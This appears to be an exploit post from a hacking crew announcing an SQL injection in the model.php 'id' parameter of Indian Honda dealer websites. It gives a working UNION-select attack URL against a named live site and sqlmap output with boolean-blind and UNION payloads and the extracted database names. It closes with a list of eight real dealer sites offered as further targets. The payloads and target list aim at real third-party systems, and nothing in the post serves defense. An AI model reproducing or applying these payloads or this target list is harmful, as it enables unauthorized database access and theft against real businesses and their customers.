[+] Exploit Title: Honda - SQL Injection
[+] Author: Hz3666Ghost
[+] Contact me : t.me/Hz3666ghost
[+] Thanx to :
=======================
Indoghostsec - AnonGhost -Ghostsec - Anxsec Syndicate - Indonesian Fighter Cyber - Skullcybersec - rajawalisecteam - morrocanghost - and other
=======================
[+] Exploit :
http://www.superhonda.in/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports
SUPERSALES_DB
---
Parameter: id (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: id=graziasport_01' HAVING 2323=2323-- uiHt&name=grazia125_sports
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-3968' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qbkbq','ycHfCYHnEQRMgvltdtwfktnmrBQRhJOlvYTPSLBU'),'qzkjq')-- enPH&name=grazia125_sports
---
.......
[14:36:18] [INFO] resumed: 'supersales_db'
available databases [2]:
[*] information_schema
[*] supersales_db
=======================
[+] Demo :
https://imperialhonda.in/model.php?id=grazia125_01&name=grazia_125
http://www.shitalhonda.in/model.php?id=grazia125_01&name=grazia_125
http://www.royalhonda.in/model.php?id=grazia125_01&name=grazia_125
http://www.superhonda.in/model.php?id=graziasport_01&name=grazia125_sports
https://gandhihonda.com/model.php?id=grazia125_01&name=grazia_125
http://harikrishnahonda.com/model.php?id=graziasport_01&name=grazia125_sports
https://anjalihonda.com/model.php?id=grazia125_01&name=grazia_125
http://anamikahonda.com/model.php?id=graziasport_01&name=grazia125_sports